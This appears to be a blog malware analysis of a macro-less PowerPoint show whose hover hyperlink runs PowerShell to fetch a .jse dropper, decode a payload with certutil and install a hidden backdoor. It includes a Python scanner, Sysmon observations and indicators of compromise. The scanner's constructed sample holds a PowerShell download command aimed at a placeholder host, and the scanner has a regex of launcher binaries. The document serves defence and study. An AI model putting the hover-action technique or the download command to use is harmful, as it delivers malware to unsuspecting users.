First,

I would like to thank “Marry Trame” at peerlyst.com for posting about this new delivery method discovered for a malware downloader. A link to the original post can be found at the bottom of this analysis. Note that I edited the domain in the PowerPoint to one of my own, so the sample would not actually reach the C&C server for the malicious .jse file.

Analysis Summary:

This PowerPoint document was interesting to analyze because it does not rely on macros, JavaScript or VBA for its execution method, so it does not fit the usual Office exploitation pattern. The file is a .ppsx (PowerPoint Show), so it opens directly in slideshow view, and the user is presented with the text “Loading…Please wait”, displayed as a blue hyperlink. When the user mouses over the text (the most common way a user would check a hyperlink), PowerPoint executes PowerShell. This is accomplished by an element definition for a hover action: the hover action is set up to run a program when the user mouses over the text. In the relationships definition for slide1, “rID2” is defined as a hyperlink whose target is a PowerShell command. Due to its length it can be seen in the step-by-step screenshot explanations below.
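
A PowerPoint package is a zip archive, so the two pieces described above can be checked without opening the file in Office: each slide part (ppt/slides/slideN.xml) carries the action element, and the rId it references is resolved in the slide's relationships part (ppt/slides/_rels/slideN.xml.rels), where the Target holds the command. The scanner below is an added example written for this write-up, not code from the original analysis. It builds a constructed package in memory that mirrors that layout; the command line, the example.invalid domain and the exact attribute values in the constructed XML are placeholders, not copied from the sample. It flags any hover or click action whose action URI is PowerPoint's run-program action, or whose external target starts with a command interpreter.

```python
"""Static scan of a .pptx/.ppsx package for hover/click actions that launch a program.

Added example for this write-up, not code from the original analysis. In PresentationML
a hover action is an <a:hlinkHover> element inside a run's properties; its r:id is
resolved in the slide's .rels part, and action="ppaction://program" tells PowerPoint
to run the relationship Target as a program instead of opening it as a URL.
The constructed sample mirrors that layout with placeholder command/domain values.
"""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "a": "http://schemas.openxmlformats.org/drawingml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "rel": "http://schemas.openxmlformats.org/package/2006/relationships",
}
HYPERLINK_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                  "relationships/hyperlink")
RUN_PROGRAM = "ppaction://program"
# Interpreters and LOLBins that have no business as a slide hyperlink target.
LAUNCHER_RE = re.compile(
    r"^\s*(powershell|pwsh|cmd|wscript|cscript|mshta|certutil|rundll32|regsvr32|bitsadmin)"
    r"(\.exe)?\b", re.IGNORECASE)


def scan_package(data: bytes):
    """Return findings as dicts: slide part, action element, rId, action URI, target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        for name in sorted(names):
            m = re.fullmatch(r"ppt/slides/(slide\d+)\.xml", name)
            if not m:
                continue
            rels_name = "ppt/slides/_rels/%s.xml.rels" % m.group(1)
            targets = {}  # rId -> Target, external hyperlink relationships only
            if rels_name in names:
                for rel in ET.fromstring(zf.read(rels_name)).iter("{%(rel)s}Relationship" % NS):
                    if rel.get("Type") == HYPERLINK_TYPE and rel.get("TargetMode") == "External":
                        targets[rel.get("Id")] = rel.get("Target", "")
            slide = ET.fromstring(zf.read(name))
            for tag in ("hlinkHover", "hlinkClick"):
                for el in slide.iter("{%s}%s" % (NS["a"], tag)):
                    rid = el.get("{%(r)s}id" % NS)
                    action = el.get("action", "")
                    target = targets.get(rid, "")
                    # Flag a run-program action regardless of target, and any
                    # external target that starts with a command interpreter.
                    if action == RUN_PROGRAM or LAUNCHER_RE.match(target):
                        findings.append({"part": name, "element": tag, "rId": rid,
                                         "action": action, "target": target})
    return findings


def build_constructed_sample() -> bytes:
    """Constructed package: one slide whose hover action runs a placeholder PowerShell command."""
    slide_xml = (
        '<p:sld xmlns:a="%(a)s" xmlns:r="%(r)s" '
        'xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">'
        '<p:cSld><p:spTree><p:sp><p:txBody><a:p><a:r><a:rPr lang="en-US">'
        '<a:hlinkHover r:id="rId2" action="ppaction://program"/>'
        '</a:rPr><a:t>Loading...Please wait</a:t></a:r></a:p></p:txBody></p:sp>'
        '</p:spTree></p:cSld></p:sld>' % NS)
    rels_xml = (
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId2" Type="%s" TargetMode="External" Target="powershell -NoP -W Hidden '
        '-c &quot;(New-Object Net.WebClient).DownloadFile(\'http://example.invalid/c.php\','
        '$env:TEMP+\'\\ii.jse\')&quot;"/></Relationships>' % (NS["rel"], HYPERLINK_TYPE))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", slide_xml)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Scan a real file if given a path, otherwise the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    for f in scan_package(data):
        print("%(part)s %(element)s %(rId)s action=%(action)s target=%(target)s" % f)
```

Run it against a suspicious file with `python scan_ppsx.py order.ppsx`; a clean deck produces no output, because ordinary hyperlinks have no `ppaction://program` action and their targets are URLs, not interpreter names.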

When that PowerShell executes it reaches out to the domain “cccn.nl” for a c.php file and downloads it to disk as a file named “ii.jse” in the Temp folder. ii.jse is executed by wscript.exe and drops a file named “168.gop”; the script then runs certutil.exe with the -decode parameter, which Base64-decodes 168.gop and saves the result in the Temp folder as “484.exe”. 484.exe is then executed and spawns mstsc.exe, the built-in Remote Desktop client, presumably to give the actors RDP access to the system. The file writes and batch execution that Sysmon attributes to mstsc.exe below are not behaviour of the legitimate client, which indicates the payload code is executing within that process. After this, 484.exe was observed being copied by mstsc.exe to AppData\Roaming\Microsoft\Internet Explorer\sectcms.exe and re-executed from the new location. A .bat file was observed being written to disk and then executed in cmd.exe. The purpose of this bat file appears to have been to set the hidden, system and read-only attributes on sectcms.exe and to delete any files in the Temp folder with the extensions .txt, .exe, .gop, .log and .jse, removing the earlier stages. I sandboxed the payload for 8 hours but no threat actors connected to the system, so I was unable to see what other purpose the backdoor might have had if the threat actors had taken a specific interest in the system.

Screenshots of Analysis:

Screenshot of Slideshow user is presented after opening PowerPoint:



Warning Message Displayed When User Mouses Over the “Loading…Please wait” text:



If the user enables the content, they are presented with the following PowerShell prompt, which quickly hides itself:



Here is a modified callout I made to test whether the PowerShell was proxy aware; I did this by editing the XML in the PowerPoint slide:



This is the slide1 relationship (rels) definition for the “rID2” element. It is easy to see that a PowerShell command is set as the target of the hyperlink:



This is the slide1 XML for the slide itself. The red highlighted section shows how the hover action is defined in slide1:



——————————————————————————————-

Sysmon Screenshots:

Sysmon Logging of PowerPoint initially opening:



Sysmon also logged the execution of the PowerShell command, in its decoded form:



Sysmon logged the initial process creation of the malicious payload:



Followed by the process creation of mstsc.exe, the Remote Desktop client, presumably used for RDP access to the compromised system:



Then the original payload process is logged as terminated:



Sysmon then logged the creation of a copy of the original payload, named sectcms.exe and hidden under the AppData folder:



Sysmon then captured the re-execution of the payload from its new location:



Sysmon then logged a .bat file being created in the Temp folder:



Sysmon then logged the execution of the .bat file through cmd.exe. The parent process was mstsc.exe:



One of the functions of the .bat file was to add the hidden, system and read-only attributes to the payload under AppData:



Sysmon then logged the process creation of a second instance of the sectcms.exe payload:



Finally, Sysmon logged the termination of one of the two sectcms.exe instances:



Indicators of Compromise:

File: order.ppsx

MD5: 823c408af2d2b19088935a07c03b4222

SHA1: df99061e8ad75929af5ac1a11b29f4122a84edaf

SHA256: f05af917f6cbd7294bd312a6aad70d071426ce5c24cf21e6898341d9f85013c0

SHA512: 2cc9e87e0d46fdd705ed429abb837015757744783bf1e904f9f22d56288b9554a1bc450142e2b1644a4912c12a522391b354d97956e4cb94890744266249b7f9

File: C:\Users\Current User\AppData\Local\Temp\168.gop

MD5: 9B5AC6C4FD5355700407962F7F51666C

SHA1: 9FDB4CD70BBFB058D450AC9A6985BF3C71840906

SHA256: E97B266D0B5AF843E49579C65838CEC113562A053B5F87A69E8135A0A82564E5

SHA512: AB85132D845437A7900E03C2F3FA773433815A4893E16F7716A5F800558B5F01827F25463EAFF619F804C484A1D23CDD5F2BCCC0F91B4B4D0C117E87D830B1B3

File: C:\Users\Current User\AppData\Local\Temp\484.exe

File: C:\Users\Current User\AppData\Roaming\Microsoft\Internet Explorer\sectcms.exe

MD5: 13CDBD8C31155610B628423DC2720419

SHA1: 7633A023852D5A0B625423BFFC3BBB14B81C6A0C

SHA256: 55C69D2B82ADDD7A0CD3BEBE910CD42B7343BD3FAA7593356BCDCA13DD73A0EF

SHA512: 19139DAE43751368E19C4963C4E087C6295CC757B215A32CB95E12BDD82BB168DB91EA3385E1D08B9A5D829549DFBB34C17CA29BFCC669C7EAE51456FCD7CA49

File: C:\Users\Current User\AppData\Local\Temp\ii.jse

MD5: F5B3D1128731CAC04B2DC955C1A41114

SHA1: 104919078A6D688E5848FF01B667B4D672B9B447

SHA256: 55821B2BE825629D6674884D93006440D131F77BED216D36EA20E4930A280302

SHA512: 65D8A4CB792E4865A216D25068274CA853165A17E2154F773D367876DCC36E7A7330B7488F05F4EE899E40BCAA5F3D827E1E1DF4915C9693A8EF9CAEBD6D4BFB

C2 Communications:

hxxp://cccn.nl/c.php

hxxp://cccn.nl/2.2

IP Address of C2/Payload Domain:

46.21.169.110

References:

https://www.peerlyst.com/posts/microsoft-office-malware-now-being-delivered-without-macros-but-using-pps-url-mouse-hover-marry-tramp?trk=search_page_search_result

https://www.joesecurity.org/reports/report-823c408af2d2b19088935a07c03b4222.html

https://www.hybrid-analysis.com/sample/796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921?environmentId=100

https://www.virustotal.com/en/file/796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921/analysis/